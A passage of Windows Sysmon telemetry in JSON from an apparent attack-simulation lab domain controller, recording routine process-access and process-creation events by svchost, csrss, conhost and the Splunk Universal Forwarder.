07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.207\r\nProcessGuid: {41C8662E-1F79-5F25-0000-00105B0A0400}\r\nProcessId: 2624\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.207","ProcessGuid":"{41C8662E-1F79-5F25-0000-00105B0A0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-00105B0A0400}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-00105B0A0400}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-00105B0A0400}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-00105B0A0400}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 